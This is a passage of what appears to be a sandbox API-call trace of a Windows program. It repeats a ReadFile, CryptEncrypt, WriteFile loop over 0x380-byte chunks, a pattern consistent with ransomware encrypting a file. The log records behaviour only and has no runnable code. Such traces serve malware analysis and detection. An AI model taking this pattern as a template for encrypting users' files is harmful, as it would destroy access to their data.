lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.814] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.814] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.814] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.814] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.814] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.814] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.814] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.814] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.814] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.814] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.814] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.815] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.822] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.822] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.823] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.823] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.823] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.823] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.823] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.823] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.823] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.823] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.823] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.824] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.824] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.824] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.824] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.824] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.824] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.824] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.824] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.824] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.825] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.825] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.825] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.825] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.825] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.825] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.825] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.825] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.825] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.825] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.826] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.826] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.826] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.826] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.826] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.826] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.826] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.826] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.826] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.826] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.826] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.826] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.827] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.827] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.827] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.827] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.827] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.827] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.827] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.827] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.827] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.827] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.827] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.827] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.828] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.828] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.828] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.828] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.828] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.828] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.828] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.828] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.828] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.828] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.828] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.828] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.828] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.828] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.829] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.829] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.829] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.829] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.829] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.829] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.829] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.829] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.829] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.829] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.829] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.829] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.830] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.830] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.830] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.830] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.830] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.830] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.830] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.830] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.830] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.830] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.831] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 